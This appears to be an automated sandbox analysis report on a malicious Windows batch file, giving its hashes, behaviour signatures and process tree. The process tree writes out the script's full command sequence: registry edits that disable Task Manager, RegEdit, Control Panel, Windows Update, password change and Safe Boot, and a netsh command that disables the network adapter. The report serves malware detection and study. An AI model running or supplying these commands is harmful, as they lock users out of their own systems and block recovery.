Analysis
-
max time kernel
0s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-06-2024 12:50
Static task
static1
Behavioral task
behavioral1
Sample
test.bat
Resource
win11-20240508-en
windows11-21h2-x64
4 signatures
150 seconds
General
-
Target
test.bat
-
Size
3KB
-
MD5
252dfe9f4be7028477c9e5f9c847ce3c
-
SHA1
62e44423243d9f0c5b51ed889236993880064cd1
-
SHA256
0c5924fa33f3005938cf82c64cf548a6a96216c512b7377d13c72d81ecb18969
-
SHA512
1a36e5896cc028acfdfccfb8d57c3c2fb8ea9440a45f0625cc9a001920174c789d78ce36ac30decb05dd50151a5a9bec7fa420717a39f7aff5a531c282f0c304
Score
8/10
Malware Config
Signatures
-
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 1944 wrote to memory of 4448 1944 cmd.exe 78 PID 1944 wrote to memory of 4448 1944 cmd.exe 78 PID 1944 wrote to memory of 3636 1944 cmd.exe 79 PID 1944 wrote to memory of 3636 1944 cmd.exe 79 PID 1944 wrote to memory of 1460 1944 cmd.exe 80 PID 1944 wrote to memory of 1460 1944 cmd.exe 80 PID 1944 wrote to memory of 4772 1944 cmd.exe 81 PID 1944 wrote to memory of 4772 1944 cmd.exe 81 PID 1944 wrote to memory of 2016 1944 cmd.exe 82 PID 1944 wrote to memory of 2016 1944 cmd.exe 82 PID 1944 wrote to memory of 396 1944 cmd.exe 83 PID 1944 wrote to memory of 396 1944 cmd.exe 83 PID 1944 wrote to memory of 4480 1944 cmd.exe 84 PID 1944 wrote to memory of 4480 1944 cmd.exe 84 PID 1944 wrote to memory of 3536 1944 cmd.exe 85 PID 1944 wrote to memory of 3536 1944 cmd.exe 85 PID 1944 wrote to memory of 4724 1944 cmd.exe 86 PID 1944 wrote to memory of 4724 1944 cmd.exe 86 PID 1944 wrote to memory of 2524 1944 cmd.exe 87 PID 1944 wrote to memory of 2524 1944 cmd.exe 87 PID 1944 wrote to memory of 1408 1944 cmd.exe 88 PID 1944 wrote to memory of 1408 1944 cmd.exe 88 PID 1944 wrote to memory of 4084 1944 cmd.exe 89 PID 1944 wrote to memory of 4084 1944 cmd.exe 89 PID 1944 wrote to memory of 2264 1944 cmd.exe 90 PID 1944 wrote to memory of 2264 1944 cmd.exe 90 PID 1944 wrote to memory of 488 1944 cmd.exe 91 PID 1944 wrote to memory of 488 1944 cmd.exe 91 PID 1944 wrote to memory of 4076 1944 cmd.exe 92 PID 1944 wrote to memory of 4076 1944 cmd.exe 92 PID 1944 wrote to memory of 2832 1944 cmd.exe 93 PID 1944 wrote to memory of 2832 1944 cmd.exe 93 PID 1944 wrote to memory of 4876 1944 cmd.exe 94 PID 1944 wrote to memory of 4876 1944 cmd.exe 94
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\system32\reg.exeREG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4448
-
-
C:\Windows\system32\reg.exeREG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f2⤵
- Disables RegEdit via registry modification
PID:3636
-
-
C:\Windows\system32\reg.exeREG ADD "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v "NoActiveDesktop" /t REG_DWORD /d 00000001 /f2⤵PID:1460
-
-
C:\Windows\system32\reg.exeREG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network" /v "NoNetSetup" /t REG_DWORD /d 1 /f2⤵PID:4772
-
-
C:\Windows\system32\reg.exeREG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network" /v "NoNetSetupIDPage" /t REG_DWORD /d 1 /f2⤵PID:2016
-
-
C:\Windows\system32\reg.exeREG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWinKeys" /t REG_DWORD /d 1 /f2⤵PID:396
-
-
C:\Windows\system32\reg.exeREG add "HKLM\System\CurrentControlSet\Control\SafeBoot" /v "Minimal" /t REG_SZ /d "Disabled" /f2⤵PID:4480
-
-
C:\Windows\system32\reg.exeREG add "HKLM\System\CurrentControlSet\Control\SafeBoot" /v "Network" /t REG_SZ /d "Disabled" /f2⤵PID:3536
-
-
C:\Windows\system32\reg.exeREG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate" /v "DisableWindowsUpdateAccess" /t REG_DWORD /d 1 /f2⤵PID:4724
-
-
C:\Windows\system32\reg.exeREG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f2⤵PID:2524
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableCalc /t REG_DWORD /d 1 /f2⤵PID:1408
-
-
C:\Windows\system32\reg.exereg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFileOperation /t REG_DWORD /d 1 /f2⤵PID:4084
-
-
C:\Windows\system32\reg.exereg add "HKCUSOFTWAREPoliciesMicrosoftWindowsSystem" /v DisableCalculator /t REG_DWORD /d 1 /f2⤵PID:2264
-
-
C:\Windows\system32\reg.exereg add "HKCUSOFTWAREPoliciesMicrosoftWindowsSystem" /v DisableMSpaint /t REG_DWORD /d 1 /f2⤵PID:488
-
-
C:\Windows\system32\reg.exeREG ADD "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /V DisableControlPanel /T REG_DWORD /D 1 /F2⤵PID:4076
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵PID:2832
-
-
C:\Windows\system32\netsh.exenetsh interface set interface "Ethernet" disable2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4876
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman1⤵PID:2396